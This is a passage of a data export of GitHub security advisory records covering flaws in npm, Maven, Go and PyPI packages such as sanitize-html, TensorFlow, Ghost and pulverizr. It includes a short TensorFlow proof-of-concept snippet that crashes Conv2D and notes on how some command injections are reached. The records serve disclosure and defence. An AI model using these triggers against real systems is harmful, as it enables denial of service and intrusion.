'2021-05-18T20:40:17Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-mjxr-4v3x-q3m4,2021-03-29T23:13:11Z,2021-05-06T16:10:19Z,,['CVE-2021-26540'],Improper Input Validation in sanitize-html,"Apostrophe Technologies sanitize-html before 2.3.2 does not properly validate the hostnames set by the ""allowedIframeHostnames"" option when the ""allowIframeRelativeUrls"" is set to true, which allows attackers to bypass hostname whitelist for iframe element, related using an src value that starts with ""/\\example.com"".","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'sanitize-html'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-26540'}, {'type': 'WEB', 'url': 'https://github.com/apostrophecms/sanitize-html/pull/460'}, {'type': 'WEB', 'url': 'https://advisory.checkmarx.net/advisory/CX-2021-4309'}, {'type': 'WEB', 'url': 'https://github.com/apostrophecms/sanitize-html/blob/main/CHANGELOG.md#232-2021-01-26'}]","{'cwe_ids': ['CWE-20'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-29T23:13:11Z', 'nvd_published_at': '2021-02-08T17:15:00Z'}" +1.4.0,GHSA-fw5f-7c6c-3vmv,2022-09-21T22:35:51Z,2021-05-07T16:16:30Z,,['CVE-2020-10544'],Cross-site Scripting in PrimeFaces,"An XSS issue was discovered in tooltip/tooltip.js in PrimeTek PrimeFaces 7.0.11. In a web application using PrimeFaces, an attacker can provide JavaScript code in an input field whose data is later used as a tooltip title without any input validation.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'primefaces'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '8.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-10544'}, {'type': 'WEB', 'url': 'https://github.com/primefaces/primefaces/issues/5642'}, {'type': 'WEB', 'url': 'https://github.com/primefaces/primefaces/commit/9982c4f7a83f75e3ab06168fa283e3d6128dfd1f'}, {'type': 'PACKAGE', 'url': 'https://github.com/primefaces/primefaces'}]","{'cwe_ids': ['CWE-79'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-03T20:39:02Z', 'nvd_published_at': '2020-03-13T15:15:00Z'}" +1.4.0,GHSA-43f8-2h32-f4cj,2022-03-18T20:25:44Z,2021-05-06T16:10:39Z,,['CVE-2021-23362'],Regular Expression Denial of Service in hosted-git-info,The npm package `hosted-git-info` before 3.0.8 are vulnerable to Regular Expression Denial of Service (ReDoS) via regular expression shortcutMatch in the fromUrl function in index.js. The affected regular expression exhibits polynomial worst-case time complexity,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'npm', 'name': 'hosted-git-info'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.8.9'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'hosted-git-info'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '3.0.0'}, {'fixed': '3.0.8'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-23362'}, {'type': 'WEB', 'url': 'https://github.com/npm/hosted-git-info/pull/76'}, {'type': 'WEB', 'url': 'https://github.com/npm/hosted-git-info/commit/29adfe5ef789784c861b2cdeb15051ec2ba651a7'}, {'type': 'WEB', 'url': 'https://github.com/npm/hosted-git-info/commit/8d4b3697d79bcd89cdb36d1db165e3696c783a01'}, {'type': 'WEB', 'url': 'https://github.com/npm/hosted-git-info/commit/bede0dc38e1785e732bf0a48ba6f81a4a908eba3'}, {'type': 'WEB', 'url': 'https://cert-portal.siemens.com/productcert/pdf/ssa-389290.pdf'}, {'type': 'PACKAGE', 'url': 'https://github.com/npm/hosted-git-info'}, {'type': 'WEB', 'url': 'https://github.com/npm/hosted-git-info/commits/v2'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1088356'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-HOSTEDGITINFO-1088355'}]","{'cwe_ids': ['CWE-400'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-03-24T21:06:22Z', 'nvd_published_at': '2021-03-23T17:15:00Z'}" +1.4.0,GHSA-vwpg-f6gw-rjvf,2021-05-07T18:52:54Z,2021-05-10T15:18:50Z,,['CVE-2021-22113'],Incorrect Authorization in Spring Cloud Netflix Zuul,"Applications using the “Sensitive Headers” functionality in Spring Cloud Netflix Zuul 2.2.6.RELEASE and below may be vulnerable to bypassing the “Sensitive Headers” restriction when executing requests with specially constructed URLs. Applications that use Spring Security's StrictHttpFirewall (enabled by default for all URLs) are not affected by the vulnerability, as they reject requests that allow bypassing.",[],"[{'package': {'ecosystem': 'Maven', 'name': 'org.springframework.cloud:spring-cloud-netflix-zuul'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.2.7'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-22113'}, {'type': 'WEB', 'url': 'https://github.com/spring-cloud/spring-cloud-netflix/commit/8ecb3dca511c3ce0454e42ac31ee2331d7318c07'}, {'type': 'WEB', 'url': 'https://tanzu.vmware.com/security/cve-2021-22113'}]","{'cwe_ids': ['CWE-863'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T18:52:54Z', 'nvd_published_at': '2021-02-23T17:15:00Z'}" +1.4.0,GHSA-h68q-55jf-x68w,2021-04-20T17:46:27Z,2021-05-10T18:47:53Z,,['CVE-2020-7746'],Prototype pollution in chart.js,"This affects the package chart.js before 2.9.4. The options parameter is not properly sanitized when it is processed. When the options are processed, the existing options (or the defaults options) are deeply merged with provided options. However, during this operation, the keys of the object being set are not checked, leading to a prototype pollution.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'chart.js'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.9.4'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7746'}, {'type': 'WEB', 'url': 'https://github.com/chartjs/Chart.js/pull/7920'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWER-1019375'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSBOWERGITHUBCHARTJS-1019376'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1019374'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-CHARTJS-1018716'}]","{'cwe_ids': ['CWE-1321', 'CWE-915'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-04-20T17:46:27Z', 'nvd_published_at': '2020-10-29T08:15:00Z'}" +1.4.0,GHSA-mg53-xr8m-86hw,2021-05-05T19:14:04Z,2021-05-07T15:54:54Z,,['CVE-2020-24554'],Open Redirect in Liferay Portal,"The redirect module in Liferay Portal before 7.3.3 does not limit the number of URLs resulting in a 404 error that is recorded, which allows remote attackers to perform a denial of service attack by making repeated requests for pages that do not exist.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'com.liferay.portal:release.portal.bom'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '7.3.3'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-24554'}, {'type': 'WEB', 'url': 'https://portal.liferay.dev/learn/security/known-vulnerabilities'}, {'type': 'WEB', 'url': 'https://portal.liferay.dev/learn/security/known-vulnerabilities/-/asset_publisher/HbL5mxmVrnXW/content/id/119784956'}]","{'cwe_ids': ['CWE-601'], 'severity': 'HIGH', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T19:14:04Z', 'nvd_published_at': '2020-09-01T14:15:00Z'}" +1.4.0,GHSA-q4h8-7qff-gh6c,2021-05-04T22:08:54Z,2021-05-06T18:28:08Z,,['CVE-2020-8134'],Server-side request forgery in Ghost CMS,Server-side request forgery (SSRF) vulnerability in Ghost CMS < 3.10.0 allows an attacker to scan local or external network or otherwise interact with internal systems.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N'}]","[{'package': {'ecosystem': 'npm', 'name': 'ghost'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '3.10.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-8134'}, {'type': 'WEB', 'url': 'https://hackerone.com/reports/793704'}]","{'cwe_ids': ['CWE-918'], 'severity': 'MODERATE', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T22:08:54Z', 'nvd_published_at': '2020-03-20T19:15:00Z'}" +1.4.0,GHSA-x462-89pf-6r5h,2021-05-20T20:52:26Z,2021-05-21T16:23:17Z,,['CVE-2021-21404'],Crash due to malformed relay protocol message,"### Impact + +1. `syncthing` can be caused to crash and exit if sent a malformed relay + protocol message message with a negative length field. + +2. The relay server `strelaysrv` can be caused to crash and exit if sent + a malformed relay protocol message with a negative length field. + +At no point is sensitive data exposed or liable to be altered due to this +issue. Sensitive data is never exposed to relay operators. Syncthing itself +would need to be lured to connect to a malicious relay server in order to +exploit the issue. + +### Patches + +Fixed in version 1.15.0. + +### Workarounds + +1. No known workaround for `strelaysrv`. + +2. `syncthing` can be configured to not use relays, or to only use specific, + trusted relays. If Syncthing is used in a closed environment or with + relaying disabled, i.e., it does not communicate with unknown relays, + Syncthing is not vulnerable. + +### For more information + +If you have any questions or comments about this advisory, please discuss it [on the forum](https://forum.syncthing.net/). + +Thanks to Wojciech Paciorek for discovering and reporting this issue.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Go', 'name': 'github.com/syncthing/syncthing'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.15.0'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/syncthing/syncthing/security/advisories/GHSA-x462-89pf-6r5h'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-21404'}, {'type': 'WEB', 'url': 'https://github.com/syncthing/syncthing/commit/fb4fdaf4c0a79c22cad000c42ac1394e3ccb6a97'}, {'type': 'WEB', 'url': 'https://github.com/syncthing/syncthing/releases/tag/v1.15.0'}, {'type': 'WEB', 'url': 'https://pkg.go.dev/github.com/syncthing/syncthing'}]","{'cwe_ids': ['CWE-20'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-20T20:52:26Z', 'nvd_published_at': '2021-04-06T20:15:00Z'}" +1.4.0,GHSA-4q97-fh3f-j294,2021-05-07T21:50:46Z,2021-05-10T15:59:24Z,,['CVE-2020-7724'],Prototype Pollution in tiny-conf,All versions of package tiny-conf up to and including version 1.1.0 are vulnerable to Prototype Pollution via the set function.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'tiny-conf'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.1.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7724'}, {'type': 'WEB', 'url': 'https://github.com/tiny-conf/tiny-conf/commit/1f7be78bc68927996647cd45b4367f8975a3ea05'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-TINYCONF-598792'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-07T21:50:46Z', 'nvd_published_at': '2020-09-01T10:15:00Z'}" +1.4.0,GHSA-4vf2-4xcg-65cx,2021-05-18T23:14:52Z,2021-05-21T14:21:55Z,,['CVE-2021-29526'],Division by 0 in `Conv2D`,"### Impact +An attacker can trigger a division by 0 in `tf.raw_ops.Conv2D`: + +```python +import tensorflow as tf + +input = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) +filter = tf.constant([], shape=[0, 0, 0, 0], dtype=tf.float32) + +strides = [1, 1, 1, 1] +padding = ""SAME"" + +tf.raw_ops.Conv2D(input=input, filter=filter, strides=strides, padding=padding) +``` + +This is because the [implementation](https://github.com/tensorflow/tensorflow/blob/988087bd83f144af14087fe4fecee2d250d93737/tensorflow/core/kernels/conv_ops.cc#L261-L263) does a division by a quantity that is controlled by the caller: +```cc + const int64 patch_depth = filter.dim_size(2); + if (in_depth % patch_depth != 0) { ... } +``` + +### Patches +We have patched the issue in GitHub commit [b12aa1d44352de21d1a6faaf04172d8c2508b42b](https://github.com/tensorflow/tensorflow/commit/b12aa1d44352de21d1a6faaf04172d8c2508b42b). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by Ying Wang and Yakun Zhang of Baidu X-Team.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-cpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow-gpu'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-4vf2-4xcg-65cx'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29526'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/b12aa1d44352de21d1a6faaf04172d8c2508b42b'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-18T23:14:52Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-fmf5-j5j9-99pp,2023-09-06T18:31:16Z,2021-05-07T16:20:44Z,,['CVE-2020-7604'],OS Command Injection in pulverizr,"pulverizr through 0.7.0 allows execution of arbitrary commands. Within `lib/job.js`, the variable `filename` can be controlled by the attacker. This function uses the variable "filename" to construct the argument of the exec call without any sanitization. In order to successfully exploit this vulnerability, an attacker will need to create a new file with the same name as the attack command.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'pulverizr'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '0.7.0'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7604'}, {'type': 'WEB', 'url': 'https://github.com/bentruyman/pulverizr/blob/master/lib/job.js#L73'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PULVERIZR-560122'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-04T19:02:09Z', 'nvd_published_at': '2020-03-15T22:15:00Z'}" +1.4.0,GHSA-8rm6-75mf-7r7r,2021-05-17T22:27:24Z,2021-05-21T14:28:19Z,,['CVE-2021-29604'],Division by zero in TFLite's implementation of hashtable lookup,"### Impact +The TFLite implementation of hashtable lookup is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/1a8e885b864c818198a5b2c0cbbeca5a1e833bc8/tensorflow/lite/kernels/hashtable_lookup.cc#L114-L115): + +```cc +const int num_rows = SizeOfDimension(value, 0); +const int row_bytes = value->bytes / num_rows; +``` + +An attacker can craft a model such that `values`'s first dimension would be 0. + +### Patches +We have patched the issue in GitHub commit [5117e0851348065ed59c991562c0ec80d9193db2](https://github.com/tensorflow/tensorflow/commit/5117e0851348065ed59c991562c0ec80d9193db2). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-8rm6-75mf-7r7r'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29604'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/5117e0851348065ed59c991562c0ec80d9193db2'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T22:27:24Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-f8fh-8rgm-227h,2023-09-13T17:35:35Z,2021-05-07T16:16:16Z,,['CVE-2020-7602'],OS Command Injection in node-prompt-here,"node-prompt-here through 1.0.1 allows execution of arbitrary commands. The `runCommand()` is called by `getDevices()` function in file `linux/manager.js`, which is required by the `index. process.env.NM_CLI` in the file `linux/manager.js`. This function is used to construct the argument of function `execSync()`, which can be controlled by users without any sanitization.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'node-prompt-here'}, 'ecosystem_specific': {'affected_functions': ['']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.0.1'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7602'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-NODEPROMPTHERE-560115'}]","{'cwe_ids': ['CWE-78'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-03T21:44:33Z', 'nvd_published_at': '2020-03-15T22:15:00Z'}" +1.4.0,GHSA-h4j5-c7cj-74xg,2023-09-08T19:46:08Z,2021-05-04T18:02:34Z,,['CVE-2020-28502'],xmlhttprequest and xmlhttprequest-ssl vulnerable to Arbitrary Code Injection,"This affects the package xmlhttprequest before 1.7.0; all versions of package xmlhttprequest-ssl. Provided requests are sent synchronously (`async=False` on `xhr.open`), malicious user input flowing into `xhr.send` could result in arbitrary code being injected and run.","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'xmlhttprequest'}, 'ecosystem_specific': {'affected_functions': ['xmlhttprequest.XMLHttpRequest']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.7.0'}]}]}, {'package': {'ecosystem': 'npm', 'name': 'xmlhttprequest-ssl'}, 'ecosystem_specific': {'affected_functions': ['xmlhttprequest-ssl.XMLHttpRequest']}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.6.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-28502'}, {'type': 'WEB', 'url': 'https://github.com/driverdan/node-XMLHttpRequest/commit/983cfc244c7567ad6a59e366e55a8037e0497fe6'}, {'type': 'WEB', 'url': 'https://github.com/mjwwit/node-XMLHttpRequest/commit/ee1e81fc67729c7c0eba5537ed7fe1e30a6b3291'}, {'type': 'WEB', 'url': 'https://github.com/driverdan/node-XMLHttpRequest/blob/1.6.0/lib/XMLHttpRequest.js#L480'}, {'type': 'WEB', 'url': 'https://github.com/driverdan/node-XMLHttpRequest/blob/1.6.0/lib/XMLHttpRequest.js%23L480'}, {'type': 'WEB', 'url': 'https://github.com/mjwwit/node-XMLHttpRequest/blob/ae38832a0f1347c5e96dda665402509a3458e302/lib/XMLHttpRequest.js#L531'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1082937'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JAVA-ORGWEBJARSNPM-1082938'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-XMLHTTPREQUEST-1082935'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-XMLHTTPREQUESTSSL-1082936'}]","{'cwe_ids': ['CWE-94'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-03-18T20:34:02Z', 'nvd_published_at': '2021-03-05T18:15:00Z'}" +1.4.0,GHSA-m428-jqc4-2p5j,2021-05-05T21:46:10Z,2021-05-06T17:28:46Z,,['CVE-2020-7700'],Prototype Pollution in phpjs,All versions of phpjs up to and including 1.3.2 are vulnerable to Prototype Pollution via parse_str. phpjs is no longer maintained and users are advised to use Locutus as a replacement (https://github.com/locutusjs/locutus),"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H'}]","[{'package': {'ecosystem': 'npm', 'name': 'phpjs'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'last_affected': '1.3.2'}]}]}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2020-7700'}, {'type': 'WEB', 'url': 'https://snyk.io/vuln/SNYK-JS-PHPJS-598681'}]","{'cwe_ids': ['CWE-1321'], 'severity': 'CRITICAL', 'github_reviewed': True, 'github_reviewed_at': '2021-05-05T21:46:10Z', 'nvd_published_at': '2020-08-14T15:15:00Z'}" +1.4.0,GHSA-97wf-p777-86jq,2021-05-17T22:32:34Z,2021-05-21T14:28:01Z,,['CVE-2021-29599'],Division by zero in TFLite's implementation of Split,"### Impact +The implementation of the `Split` TFLite operator is [vulnerable to a division by zero error](https://github.com/tensorflow/tensorflow/blob/e2752089ef7ce9bcf3db0ec618ebd23ea119d0c7/tensorflow/lite/kernels/split.cc#L63-L65): + +```cc +TF_LITE_ENSURE_MSG(context, input_size % num_splits == 0, ""Not an even split""); +const int slice_size = input_size / num_splits; +``` + +An attacker can craft a model such that `num_splits` would be 0. + +### Patches +We have patched the issue in GitHub commit [b22786e7e9b7bdb6a56936ff29cc7e9968d7bc1d](https://github.com/tensorflow/tensorflow/commit/b22786e7e9b7bdb6a56936ff29cc7e9968d7bc1d). + +The fix will be included in TensorFlow 2.5.0. We will also cherrypick this commit on TensorFlow 2.4.2, TensorFlow 2.3.3, TensorFlow 2.2.3 and TensorFlow 2.1.4, as these are also affected and still in supported range. + +### For more information +Please consult [our security guide](https://github.com/tensorflow/tensorflow/blob/master/SECURITY.md) for more information regarding the security model and how to contact us with issues and questions. + +### Attribution +This vulnerability has been reported by members of the Aivul Team from Qihoo 360. ","[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:N/I:N/A:L'}]","[{'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '2.1.4'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.2.0'}, {'fixed': '2.2.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.3.0'}, {'fixed': '2.3.3'}]}]}, {'package': {'ecosystem': 'PyPI', 'name': 'tensorflow'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '2.4.0'}, {'fixed': '2.4.2'}]}]}]","[{'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/security/advisories/GHSA-97wf-p777-86jq'}, {'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-29599'}, {'type': 'WEB', 'url': 'https://github.com/tensorflow/tensorflow/commit/b22786e7e9b7bdb6a56936ff29cc7e9968d7bc1d'}]","{'cwe_ids': ['CWE-369'], 'severity': 'LOW', 'github_reviewed': True, 'github_reviewed_at': '2021-05-17T22:32:34Z', 'nvd_published_at': '2021-05-14T20:15:00Z'}" +1.4.0,GHSA-567x-m4wm-87v8,2022-04-22T15:50:03Z,2021-05-10T15:23:25Z,,['CVE-2021-28657'],Infinite loop in Apache Tika,A carefully crafted or corrupt file may trigger an infinite loop in Tika's MP3Parser up to and including Tika 1.25. Apache Tika users should upgrade to 1.26 or later.,"[{'type': 'CVSS_V3', 'score': 'CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H'}]","[{'package': {'ecosystem': 'Maven', 'name': 'org.apache.tika:tika'}, 'ranges': [{'type': 'ECOSYSTEM', 'events': [{'introduced': '0'}, {'fixed': '1.26'}]}], 'database_specific': {'last_known_affected_version_range': '< 1.25'}}]","[{'type': 'ADVISORY', 'url': 'https://nvd.nist.gov/vuln/detail/CVE-2021-28657'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r4cbc3f6981cd0a1a482531df9d44e4c42a7f63342a7ba78b7bff8a1b@%3Cnotifications.james.apache.org%3E'}, {'type': 'WEB', 'url': 'https://lists.apache.org/thread.html/r915add4aa52c60d1b5cf085039cfa73a98d7fae9673374dfd7744b5a%40%3Cdev.tika.apache.org%3E'}, {'type': 'WEB', 